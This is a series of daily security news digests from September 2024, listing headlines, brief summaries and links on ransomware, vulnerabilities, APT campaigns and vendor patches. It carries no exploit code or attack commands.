∗∗∗ Microsoft Windows MSI Installer - Repair to SYSTEM - A detailed journey ∗∗∗
---------------------------------------------
Repair functions of Microsoft Windows MSI installers can be vulnerable in several ways, for instance allowing local attackers to ..
---------------------------------------------
https://sec-consult.com/blog/detail/msi-installer-repair-to-system-a-detail…
∗∗∗ Living off the land, GPO style ∗∗∗
---------------------------------------------
TL;DR The ability to edit Group Policy Object (GPOs) from non-domain joined computers using the native Group Policy editor has been on my list for a long time. This blog ..
---------------------------------------------
https://www.pentestpartners.com/security-blog/living-off-the-land-gpo-style/
∗∗∗ Ransomware: Attacks Once More Nearing Peak Levels ∗∗∗
---------------------------------------------
Attacks surge again in second quarter of 2024 as attackers bounce back from disruption.
---------------------------------------------
https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomwa…
∗∗∗ Introduction to Third-Party Risk Management ∗∗∗
---------------------------------------------
In today’s world, organizations are increasingly depending on their third-party vendors, suppliers, and partners to support their operations. This way of working, in addition to the digitalization era we’re in, can have great advantages such as being able to offer new services quickly while relying on others' expertise or cutting costs on already existing processes.
---------------------------------------------
https://blog.nviso.eu/2024/09/12/introduction-to-third-party-risk-managemen…
∗∗∗ Vulnerability in Acrobat Reader could lead to remote code execution; Microsoft patches information disclosure issue in Windows API ∗∗∗
---------------------------------------------
CVE-2024-38257 is considered “less likely” to be exploited, though it does not require any user interaction or user privileges.
---------------------------------------------
https://blog.talosintelligence.com/vulnerability-roundup-sept-11-2024/
∗∗∗ Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities ∗∗∗
---------------------------------------------
In this blog entry, we provide an analysis of the recent remote code execution attacks related to Progress Software’s WhatsUp Gold that possibly abused the vulnerabilities CVE-2024-6670 and CVE-2024-6671.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/i/whatsup-gold-rce.html
∗∗∗ Hadooken Malware Targets Weblogic Applications ∗∗∗
---------------------------------------------
Aqua Nautilus researchers identified a new Linux malware targeting Weblogic servers. The main payload calls itself Hadooken which we think is referring to the attack “surge fist” in the Street Fighter series. When Hadooken is executed, ..
---------------------------------------------
https://blog.aquasec.com/hadooken-malware-targets-weblogic-applications-1
∗∗∗ Microsoft Office: ActiveX is being switched off ∗∗∗
---------------------------------------------
It has been quiet about it for a while, but ActiveX still exists. Upcoming Microsoft Office versions will finally disable support for it. At least almost.
---------------------------------------------
https://heise.de/-9865690
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco Routed Passive Optical Network Controller Vulnerabilities ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco IOS XR Software UDP Packet Memory Exhaustion Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Multiple Cisco Products Web-Based Management Interface Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco IOS XR Software Network Convergence System Denial of Service Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco IOS XR Software Segment Routing for Intermediate System-to-Intermediate System Denial of Service Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco IOS XR Software Dedicated XML Agent TCP Denial of Service Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco IOS XR Software CLI Arbitrary File Read Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco IOS XR Software CLI Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 10-09-2024 18:00 − Wednesday 11-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ New PIXHELL acoustic attack leaks secrets from LCD screen noise ∗∗∗
---------------------------------------------
A novel acoustic attack named PIXHELL can leak secrets from air-gapped and audio-gapped systems, and without requiring speakers, through the LCD monitors they connect to.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-pixhell-acoustic-attack-…
∗∗∗ Air-gapped systems: malware uses LCD pixel patterns for data exfiltration via sound ∗∗∗
---------------------------------------------
Reception takes place, for example, via a nearby smartphone. The data rate is low, but sufficient for keylogging and passwords.
---------------------------------------------
https://www.golem.de/news/air-gapped-systeme-malware-nutzt-lcd-pixelmuster-…
∗∗∗ Python Libraries Used for Malicious Purposes ∗∗∗
---------------------------------------------
Since I'm interested in malicious Python scripts, I found multiple samples that rely on existing libraries. The most-known repository is probably pypi.org[1] that reports, as of today, 567,478 projects! Malware developers are like regular developers: They don't want to reinvent the wheel and make their shopping across existing libraries to expand their scripts' capabilities.
---------------------------------------------
https://isc.sans.edu/forums/diary/Python+Libraries+Used+for+Malicious+Purpo…
∗∗∗ Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware ∗∗∗
---------------------------------------------
Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments. "The new samples were tracked to GitHub projects that ..
---------------------------------------------
https://thehackernews.com/2024/09/developers-beware-lazarus-group-uses.html
∗∗∗ Microsoft says it broke some Windows 10 patching – as it fixes flaws under attack ∗∗∗
---------------------------------------------
CISA wants you to leap on Citrix and Ivanti issues. Adobe, Intel, SAP also bid for patching priorities. Patch Tuesday: Another Patch Tuesday has dawned, as usual with the unpleasant news that there are pressing security weaknesses and blunders to address.
---------------------------------------------
https://www.theregister.com/2024/09/11/patch_tuesday_september_2024/
∗∗∗ So you paid a ransom demand … and now the decryptor doesn't work ∗∗∗
---------------------------------------------
A really big oh sh*t moment, for sure. For C-suite execs and security leaders, discovering your organization has been breached, your critical systems locked up and your data stolen, then receiving a ransom demand, is probably the worst day of your professional life.
---------------------------------------------
https://www.theregister.com/2024/09/11/ransomware_decryptor_not_working/
∗∗∗ Over 40,000 WordPress Sites Affected by Privilege Escalation Vulnerability Patched in Post Grid and Gutenberg Blocks Plugin ∗∗∗
---------------------------------------------
On August 14th, 2024, we received a submission for a Privilege Escalation vulnerability in Post Grid and Gutenberg Blocks, a WordPress plugin with over 40,000 active installations. This vulnerability can be leveraged by attackers with minimal authenticated access to set their role to administrator utilizing the form submission functionality.
---------------------------------------------
https://www.wordfence.com/blog/2024/09/over-40000-wordpress-sites-affected-…
∗∗∗ ADCS Attack Paths in BloodHound — Part 3 ∗∗∗
---------------------------------------------
In Part 1 of this series, we explained how we incorporated Active Directory Certificate Services (ADCS) objects into BloodHound and demonstrated how to effectively use BloodHound to identify attack paths, including the ESC1 domain escalation technique. Part 2 covered the Golden Certificates ..
---------------------------------------------
https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-3-33efb008…
∗∗∗ Phishing Pages Delivered Through Refresh HTTP Response Header ∗∗∗
---------------------------------------------
We detail a rare phishing mechanism using a refresh entry in the HTTP response header for stealth redirects to malicious pages, affecting finance and government sectors.
---------------------------------------------
https://unit42.paloaltonetworks.com/rare-phishing-page-delivery-header-refr…
∗∗∗ The September 2024 Security Update Review ∗∗∗
---------------------------------------------
We’ve reached September and the pumpkin spice floats in the air. While they aren’t pumpkin-spiced, Microsoft and Adobe have released their latest spicy security patches – including some zesty 0-days. Take a break from ..
---------------------------------------------
https://www.thezdi.com/blog/2024/9/10/the-september-2024-security-update-re…
∗∗∗ SBOMs and the importance of inventory ∗∗∗
---------------------------------------------
Can a Software Bill of Materials (SBOM) provide organisations with better insight into their supply chains?
---------------------------------------------
https://www.ncsc.gov.uk/blog-post/sboms-and-the-importance-of-inventory
∗∗∗ We Spent $20 To Achieve RCE And Accidentally Became The Admins Of .MOBI ∗∗∗
---------------------------------------------
Welcome back to another watchTowr Labs blog. Brace yourselves, this is one of our most astounding discoveries. Summary: What started out as a bit of fun between colleagues while avoiding the Vegas heat and $20 bottles of water in our Black Hat hotel ..
---------------------------------------------
https://labs.watchtowr.com/we-spent-20-to-achieve-rce-and-accidentally-beca…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (389-ds:1.4, dovecot, emacs, and glib2), Fedora (bluez, iwd, libell, linux-firmware, seamonkey, vim, and wireshark), Mageia (apr, libtiff, Nginx, openssl, orc, unbound, webmin, and zziplib), Red Hat (389-ds:1.4), and SUSE (containerd, curl, go1.22, go1.23, gstreamer-plugins-bad, kernel, ntpd-rs, python-Django, and python311).
---------------------------------------------
https://lwn.net/Articles/989772/
∗∗∗ Cisco Releases Security Updates for Cisco Smart Licensing Utility ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/09/10/cisco-releases-security-…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 09-09-2024 18:00 − Tuesday 10-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Quad7 botnet targets more SOHO and VPN routers, media servers ∗∗∗
---------------------------------------------
The Quad7 botnet is expanding its targeting scope with the addition of new clusters and custom implants that now also target Zyxel VPN appliances and Ruckus wireless routers.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/quad7-botnet-targets-more-so…
∗∗∗ NoName ransomware gang deploying RansomHub malware in recent attacks ∗∗∗
---------------------------------------------
The NoName ransomware gang has been trying to build a reputation for more than three years targeting small and medium-sized businesses worldwide with its encryptors and may now be working as a RansomHub affiliate.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/noname-ransomware-gang-deplo…
∗∗∗ Trustwave SpiderLabs Research: 20% of Ransomware Attacks in Financial Services Target Banking Institutions ∗∗∗
---------------------------------------------
The 2024 Trustwave Risk Radar Report: Financial Services Sector underscores the escalating threat landscape facing the industry.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trustwave-s…
∗∗∗ Russia's top-secret military unit reportedly plots undersea cable sabotage ∗∗∗
---------------------------------------------
US alarmed by heightened Kremlin naval activity worldwide. Russia's naval activity near undersea cables is reportedly drawing the scrutiny of US officials, further sparking concerns that the Kremlin may be plotting to "sabotage" underwater infrastructure via a secretive, dedicated military unit called the General Staff Main Directorate for Deep Sea Research (GUGI).
---------------------------------------------
https://www.theregister.com/2024/09/09/russia_readies_submarine_cable_sabot…
∗∗∗ Phishing Via Typosquatting and Brand Impersonation: Trends and Tactics ∗∗∗
---------------------------------------------
Introduction: Following the 2024 ThreatLabz Phishing Report, Zscaler ThreatLabz has been closely tracking domains associated with typosquatting and brand impersonation - common techniques used by threat actors to proliferate phishing campaigns. Typosquatting involves registering domains with misspelled versions of popular websites or ..
---------------------------------------------
https://www.zscaler.com/blogs/security-research/phishing-typosquatting-and-…
∗∗∗ Slim CD Data Breach Impacts 1.7 Million Individuals ∗∗∗
---------------------------------------------
Slim CD says the personal and credit card information of 1.7 million was compromised in a ten-month-long data breach.
---------------------------------------------
https://www.securityweek.com/slim-cd-data-breach-impacts-1-7-million-indivi…
∗∗∗ Study Finds Excessive Use of Remote Access Tools in OT Environments ∗∗∗
---------------------------------------------
The excessive use of remote access tools in OT environments can increase the attack surface, complicate identity management, and hinder visibility.
---------------------------------------------
https://www.securityweek.com/study-finds-excessive-use-of-remote-access-too…
∗∗∗ Smart home security advice. Ring, SimpliSafe, Swann, and Yale ∗∗∗
---------------------------------------------
Introduction: This guide covers the security of smart home security products from Ring, Yale, Swann, and SimpliSafe. Whether you’re looking to monitor your property remotely, enhance your home’s security, or ..
---------------------------------------------
https://www.pentestpartners.com/security-blog/smart-home-security-advice-ri…
∗∗∗ Companies overestimate their own readiness to defend against hackers ∗∗∗
---------------------------------------------
According to a recent study, 86 percent of the surveyed companies paid a "ransom" last year after their systems were infected.
---------------------------------------------
https://www.derstandard.at/story/3000000235958/firmen-ueberschaetzen-eigene…
∗∗∗ Threat Assessment: North Korean Threat Groups ∗∗∗
---------------------------------------------
Explore Unit 42's review of North Korean APT groups and their impact, detailing the top 10 malware and tools we've seen from these threat actors.
---------------------------------------------
https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-g…
∗∗∗ Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware ∗∗∗
---------------------------------------------
Repellent Scorpius distributes Cicada3301 ransomware, using double extortion and targeting global victims since May 2024. We break down their toolset and more.
---------------------------------------------
https://unit42.paloaltonetworks.com/repellent-scorpius-cicada3301-ransomwar…
∗∗∗ August 2024’s Most Wanted Malware: RansomHub Reigns Supreme While Meow Ransomware Surges ∗∗∗
---------------------------------------------
Check Point’s latest threat index reveals RansomHub’s continued dominance and Meow ransomware’s rise with novel tactics and significant impact. Check Point’s Global Threat Index for August 2024 revealed ransomware remains a dominant force, with RansomHub sustaining its position as the top ransomware group. This Ransomware-as-a-Service (RaaS) ..
---------------------------------------------
https://blog.checkpoint.com/research/august-2024s-most-wanted-malware-ranso…
∗∗∗ CISA says SonicWall bug being exploited as experts warn of ransomware gang use ∗∗∗
---------------------------------------------
Federal cybersecurity experts are warning that a vulnerability affecting products from SonicWall is being exploited, and ordered all federal civilian agencies to implement a patch for the bug by the end of the month.
---------------------------------------------
https://therecord.media/cisa-orders-patching-of-sonicwall-bug-ransomware
∗∗∗ CISA Releases Election Security Focused Checklists for Both Cybersecurity and Physical Security ∗∗∗
---------------------------------------------
Today, the Cybersecurity and Infrastructure Security Agency (CISA) released two election security checklists as part of the comprehensive suite of resources available for election officials, the Physical Security Checklist for Election Offices and Election Infrastructure Cybersecurity Readiness and Resilience Checklist. These checklists are tools to quickly review existing practices and take steps to enhance physical and cyber resilience in preparation for election day.
---------------------------------------------
https://www.cisa.gov/news-events/news/cisa-releases-election-security-focus…
∗∗∗ Do We Need Yet Another Vulnerability Scoring System? If it’s SSVC that’s a resounding YASS ∗∗∗
---------------------------------------------
Want to know about Yet Another Vulnerability Scoring System (YASS)? Ben Edwards breaks down Stakeholder Specific Vulnerability Categorization and how to make it work.
---------------------------------------------
https://www.bitsight.com/blog/do-we-need-yet-another-vulnerability-scoring-…
∗∗∗ Due to US ban: Kaspersky customers to receive UltraAV from Pango ∗∗∗
---------------------------------------------
Following the ban in the USA, the company is now migrating customers to UltraAV, Kaspersky confirmed to heise online.
---------------------------------------------
https://heise.de/-9862992
=====================
= Vulnerabilities =
=====================
∗∗∗ Citrix Releases Security Updates for Citrix Workspace App for Windows ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/09/10/citrix-releases-security…
∗∗∗ September 2024 Security Update ∗∗∗
---------------------------------------------
https://www.ivanti.com/blog/september-2024-security-update
=====================
= End-of-Day report =
=====================
Timeframe: Friday 06-09-2024 18:00 − Monday 09-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Transport for London staff faces systems disruptions after cyberattack ∗∗∗
---------------------------------------------
Transport for London, the city's public transportation agency, revealed today that its staff has limited access to systems and email due to measures implemented in response to a Sunday cyberattack.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/transport-for-london-staff-f…
∗∗∗ Software error in state election: CCC criticises lack of transparency in election software ∗∗∗
---------------------------------------------
A "botched implementation" may have led to the calculation error in the Saxony state election. The CCC is calling for more transparency.
---------------------------------------------
https://www.golem.de/news/softwarefehler-bei-landtagswahl-ccc-kritisiert-in…
∗∗∗ Attack on air-gapped systems: malware exfiltrates data wirelessly through RAM ∗∗∗
---------------------------------------------
The attack technique does not deliver a high data rate, but it is sufficient for real-time keylogging and for exfiltrating passwords and RSA keys.
---------------------------------------------
https://www.golem.de/news/angriff-auf-air-gapped-systeme-malware-exfiltrier…
∗∗∗ North Korean threat actor Citrine Sleet exploiting Chromium zero-day ∗∗∗
---------------------------------------------
Microsoft identified a North Korean threat actor exploiting a zero-day vulnerability in Chromium (CVE-2024-7971) to gain remote code execution (RCE) in the Chromium renderer process. Our assessment of ongoing analysis and observed infrastructure attributes this activity to Citrine Sleet, a North Korean threat actor that commonly targets the cryptocurrency ..
---------------------------------------------
https://www.microsoft.com/en-us/security/blog/2024/08/30/north-korean-threa…
∗∗∗ The Underground World of Black-Market AI Chatbots is Thriving ∗∗∗
---------------------------------------------
An anonymous reader shares a report: ChatGPT's 200 million weekly active users have helped propel OpenAI, the company behind the chatbot, to a $100 billion valuation. But outside the mainstream there's still plenty of money to be made -- especially if you're catering to the underworld. Illicit large language models (LLMs) can make up to $28,000 in two months ..
---------------------------------------------
https://slashdot.org/story/24/09/06/1648218/the-underground-world-of-black-…
∗∗∗ Hypervisor Development in Rust for Security Researchers (Part 1) ∗∗∗
---------------------------------------------
In the ever-evolving field of information security, curiosity and continuous learning drive innovation.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hypervisor-…
∗∗∗ Exploring an Experimental Windows Kernel Rootkit in Rust ∗∗∗
---------------------------------------------
Around two years ago, memN0ps took the initiative to create one of the first publicly available rootkit proof of concepts (PoCs) in Rust as an experimental project, while learning a new programming language. It still lacks many features, which are relatively easy to add once the concept is understood, but it was developed within a month, at a part-time capacity.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/exploring-a…
∗∗∗ Predator Spyware Resurfaces With Fresh Infrastructure ∗∗∗
---------------------------------------------
Recorded Future observes renewed Predator spyware activity on fresh infrastructure after a drop caused by US sanctions.
---------------------------------------------
https://www.securityweek.com/predator-spyware-resurfaces-with-fresh-infrast…
∗∗∗ Chinese APT Abuses VSCode to Target Government in Asia ∗∗∗
---------------------------------------------
A first in our telemetry: Chinese APT Stately Taurus uses Visual Studio Code to maintain a reverse shell in victims' environments for Southeast Asian espionage.
---------------------------------------------
https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-…
∗∗∗ Sextortion scam attempt I: recording of porn consumption; and "invoice payment" ∗∗∗
---------------------------------------------
So-called sextortion campaigns are currently running again, in which victims are to be blackmailed by e-mail with allegedly compromising material. I am therefore summarising some information from recent days about ongoing sextortion campaigns in ..
---------------------------------------------
https://www.borncity.com/blog/2024/09/09/sextortion-betrugsversuch-i-aufzei…
∗∗∗ AI Firm’s Misconfigured Server Exposed 5.3 TB of Mental Health Records ∗∗∗
---------------------------------------------
A misconfigured server from a US-based AI healthcare firm Confidant Health exposed 5.3 TB of sensitive mental health…
---------------------------------------------
https://hackread.com/ai-firm-misconfigured-server-exposed-mental-health-dat…
∗∗∗ CISA Adds Three Known Exploited Vulnerabilities to Catalog ∗∗∗
---------------------------------------------
CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/09/09/cisa-adds-three-known-ex…
∗∗∗ Keeping an eye on your own identity: Google Dark Web Report warns of data leaks ∗∗∗
---------------------------------------------
Google's Dark Web Report lets you monitor your own identity for data breaches. The service is now free and no longer part of a subscription.
---------------------------------------------
https://heise.de/-9860797
∗∗∗ Poland breaks up ring of cyber saboteurs ∗∗∗
---------------------------------------------
Poland, an EU and NATO member, is increasingly the target of cyberattacks. Warsaw suspects the activity of Russian and Belarusian intelligence services behind them.
---------------------------------------------
https://heise.de/-9862555
=====================
= Vulnerabilities =
=====================
∗∗∗ ZDI-24-1196: Adobe Acrobat Reader DC Doc Object Use-After-Free Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows remote attackers to disclose sensitive information on affected installations of Adobe Acrobat Reader DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2024-45107.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1196/
∗∗∗ DSA-5767-1 thunderbird - security update ∗∗∗
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00180.html
∗∗∗ Security Vulnerabilities fixed in Firefox ESR 115.13 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2024-30/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 05-09-2024 18:00 − Friday 06-09-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ US charges Russian GRU hackers behind WhisperGate intrusions ∗∗∗
---------------------------------------------
Feds post $10 million bounty for each of the six's whereabouts. The US today charged five Russian military intelligence officers and one civilian for their involvement in the data-wiping WhisperGate campaign conducted against Ukraine in January 2022, before the ground invasion began.
---------------------------------------------
https://www.theregister.com/2024/09/05/uncle_sam_charges_russian_gru/
∗∗∗ Ransomware Gang Claims Cyberattack on Planned Parenthood ∗∗∗
---------------------------------------------
Planned Parenthood confirms "cybersecurity incident" as RansomHub ransomware gang threatens to leak 93 Gb of data stolen from the nonprofit last week.
---------------------------------------------
https://www.securityweek.com/ransomware-gang-claims-cyberattack-on-planned-…
∗∗∗ Security vulnerabilities in Veeam Backup & Replication - updates available ∗∗∗
---------------------------------------------
The software vendor Veeam has released updates for several of its products. Among the vulnerabilities fixed in this release is CVE-2024-40711, a severe vulnerability in Veeam Backup & Replication. Exploiting this flaw allows attackers, without authentication, to ..
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/9/sicherheitslucken-in-veeam-backup-r…
∗∗∗ Active exploitation of a security vulnerability in SonicWall SonicOS (CVE-2024-40766) ∗∗∗
---------------------------------------------
On 21.08.2024, the vendor SonicWall published an advisory on a severe security vulnerability in SonicOS, its operating system for network devices. Exploitation of this vulnerability, CVE-2024-40766, could allow attackers to crash affected devices. At the same time as the ..
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/9/aktive-ausnutzung-einer-sicherheits…
∗∗∗ Colombian president suggests prior administration illegally sent $11 million in cash to Israel for spyware ∗∗∗
---------------------------------------------
Colombia’s President Gustavo Petro said Wednesday that his administration is probing the disappearance of $11 million allegedly used to buy powerful Pegasus spyware, which he said he believes was acquired by the previous administration.
---------------------------------------------
https://therecord.media/colombian-president-pegasus-spyware-israel-missing-…
∗∗∗ Password spraying attacks on (Sophos) firewalls from IP 92.53.65.166 ∗∗∗
---------------------------------------------
Brief information for administrators of Sophos firewalls - a reader has pointed out to me that since 5 September 2024 he has observed increased attack attempts against his Sophos firewalls. The VPN portal in particular is being flooded with login attempts via port 443 ..
---------------------------------------------
https://www.borncity.com/blog/2024/09/06/passwort-spraying-angriffe-auf-sop…
∗∗∗ Hunting Chromium Notifications ∗∗∗
---------------------------------------------
Browser notifications provide social-engineering opportunities. In this post we'll cover the associated forensic artifacts, threat hunting possibilities and hardening recommendations.
---------------------------------------------
https://blog.nviso.eu/2024/09/06/hunting-chromium-notifications/
∗∗∗ The best and worst ways to get users to improve their account security ∗∗∗
---------------------------------------------
In my opinion, mandatory enrollment is best enrollment.
---------------------------------------------
https://blog.talosintelligence.com/threat-source-newsletter-sept-5-2024/
=====================
= Vulnerabilities =
=====================
∗∗∗ ZDI-24-1195: Malwarebytes Antimalware Link Following Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1195/
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 04-09-2024 18:00 − Thursday 05-09-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Hacker trap: Fake OnlyFans tool backstabs cybercriminals, steals passwords ∗∗∗
---------------------------------------------
Hackers are targeting other hackers with a fake OnlyFans tool that claims to help steal accounts but instead infects threat actors with the Lumma stealer information-stealing malware.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hacker-trap-fake-onlyfans-to…
∗∗∗ Windows 11/Server 2024 SMB Security-Hardening ∗∗∗
---------------------------------------------
In anticipation of the upcoming releases of Windows 11 24H2 and Windows Server 2025, Microsoft published a Tech Community post on the topic of "SMB Security Hardening" at the end of August 2024. This is part of the Microsoft Secure Future Initiative (SFI), and the operating systems are to ship with hardened SMB settings from the start in order to be better protected against cyberattacks.
---------------------------------------------
https://www.borncity.com/blog/2024/09/05/windows-11-server-2024-smb-securit…
∗∗∗ CVE-2024-45195: Apache OFBiz Unauthenticated Remote Code Execution (Fixed) ∗∗∗
---------------------------------------------
Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution (CVE-2024-45195) on Linux and Windows. Exploitation is facilitated by bypassing previous patches. [..] Based on our analysis, three of these vulnerabilities are, essentially, the same vulnerability with the same root cause. Since the patch bypass we are disclosing today elaborates on those previous disclosures, we’ll outline them now.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-una…
∗∗∗ Watch the Typo: Our PoC Exploit for Typosquatting in GitHub Actions ∗∗∗
---------------------------------------------
In this blog, we explain how we managed to leverage typosquatting in GitHub Actions and got several applications with inadvertent typos to run our ‘fake’ action. If we had bad intentions, these mistakenly triggered actions could have included malicious code, for instance installing malware, stealing secrets, or making covert changes to code.
---------------------------------------------
https://orca.security/resources/blog/typosquatting-in-github-actions/
∗∗∗ Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 ∗∗∗
---------------------------------------------
On July 1, the project maintainers released an advisory for the vulnerability CVE-2024-36401 (CVSS score: 9.8). Multiple OGC request parameters allow remote code execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. The shortcoming has been addressed in versions 2.23.6, 2.24.4, and 2.25.2. [..] In this article, we will explore the details of the payload and malware.
---------------------------------------------
https://feeds.fortinet.com/~/904077668/0/fortinet/blogs~Threat-Actors-Explo…
=====================
= Vulnerabilities =
=====================
∗∗∗ Veeam warns of critical RCE flaw in Backup & Replication software ∗∗∗
---------------------------------------------
Veeam has released security updates for several of its products as part of a single September 2024 security bulletin that addresses 18 high and critical severity flaws in Veeam Backup & Replication, Service Provider Console, and One.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-rce-…
∗∗∗ Attackers can slip through a backdoor in Cisco Smart Licensing Utility ∗∗∗
---------------------------------------------
Due to multiple vulnerabilities, attacks on Cisco Expressway Edge, Duo Epic for Hyperdrive, Identity Services Engine, Meraki Systems Manager and Smart Licensing Utility are conceivable. [..] Smart Licensing Utility is threatened by two "critical" security vulnerabilities (CVE-2024-20439, CVE-2024-20440). In the first case, a remote attacker can access instances without logging in, because of static admin credentials. With the admin rights of that account, an attacker gains full control. [..] Meraki Systems Manager Agent for Windows can choke on a DLL file prepared with malicious code because of a vulnerability (CVE-2024-20430, "high"). [..]
---------------------------------------------
https://heise.de/-9857962
∗∗∗ Drupal: Security advisories 2024-September-04 ∗∗∗
---------------------------------------------
Drupal released 5 security advisories (1x Critical, 4x Moderately critical)
---------------------------------------------
https://www.drupal.org/security
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (bubblewrap and flatpak, containernetworking-plugins, fence-agents, ghostscript, krb5, orc, podman, python3.11, python3.9, resource-agents, runc, and wget), Debian (chromium, cinder, glance, gnutls28, nova, nsis, python-oslo.utils, ruby-sinatra, and setuptools), Fedora (kernel), Oracle (bubblewrap and flatpak, buildah, containernetworking-plugins, fence-agents, ghostscript, gvisor-tap-vsock, kernel, krb5, libndp, nodejs:18, orc, podman, postgresql, python-urllib3, python3.11, python3.12, python3.9, runc, skopeo, and wget), SUSE (hdf5, netcdf, trilinos), and Ubuntu (firefox, imagemagick, ironic, openssl, python-django, vim, and znc).
---------------------------------------------
https://lwn.net/Articles/989046/
∗∗∗ Juniper: SA Series: Multiple vulnerabilities resolved in Juniper Secure Analytics in 7.5.0 UP9 IF02 ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/On-Demand-JSA-Series-Multiple-v…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 03-09-2024 18:00 − Wednesday 04-09-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Cloning YubiKeys? ∗∗∗
---------------------------------------------
Today there was a sensational report on this: they can be cloned. [..] That is clearly not good. But as so often with headlines of this kind, it is worth reading more closely what actually happened and how realistic the attacks really are.
---------------------------------------------
https://www.cert.at/de/blog/2024/9/yubikeys-eucleak
∗∗∗ Hackers Hijack 22,000 Removed PyPI Packages, Spreading Malicious Code to Developers ∗∗∗
---------------------------------------------
A new supply chain attack technique targeting the Python Package Index (PyPI) registry has been exploited in the wild in an attempt to infiltrate downstream organizations. It has been codenamed Revival Hijack by software supply chain security firm JFrog, which said the attack method could be used to hijack 22,000 existing PyPI packages and result in "hundreds of thousands" of malicious package downloads.
---------------------------------------------
https://thehackernews.com/2024/09/hackers-hijack-22000-removed-pypi.html
∗∗∗ Hackers inject malicious JS in Cisco store to steal credit cards, credentials ∗∗∗
---------------------------------------------
Cisco's site for selling company-themed merchandise is currently offline and under maintenance due to hackers compromising it with JavaScript code that steals sensitive customer details provided at checkout.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-inject-malicious-js-…
∗∗∗ Mallox ransomware: in-depth analysis and evolution ∗∗∗
---------------------------------------------
In this report, we provide an in-depth analysis of the Mallox ransomware, its evolution, ransom strategy, encryption scheme, etc.
---------------------------------------------
https://securelist.com/mallox-ransomware/113529/
∗∗∗ Earth Lusca Uses KTLVdoor Backdoor for Multiplatform Intrusion ∗∗∗
---------------------------------------------
While monitoring Earth Lusca, we discovered the threat group’s use of KTLVdoor, a highly obfuscated multiplatform backdoor, as part of a large-scale attack campaign.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/i/earth-lusca-ktlvdoor.html
∗∗∗ Advanced forensic techniques for recovering hidden data in wearable device ∗∗∗
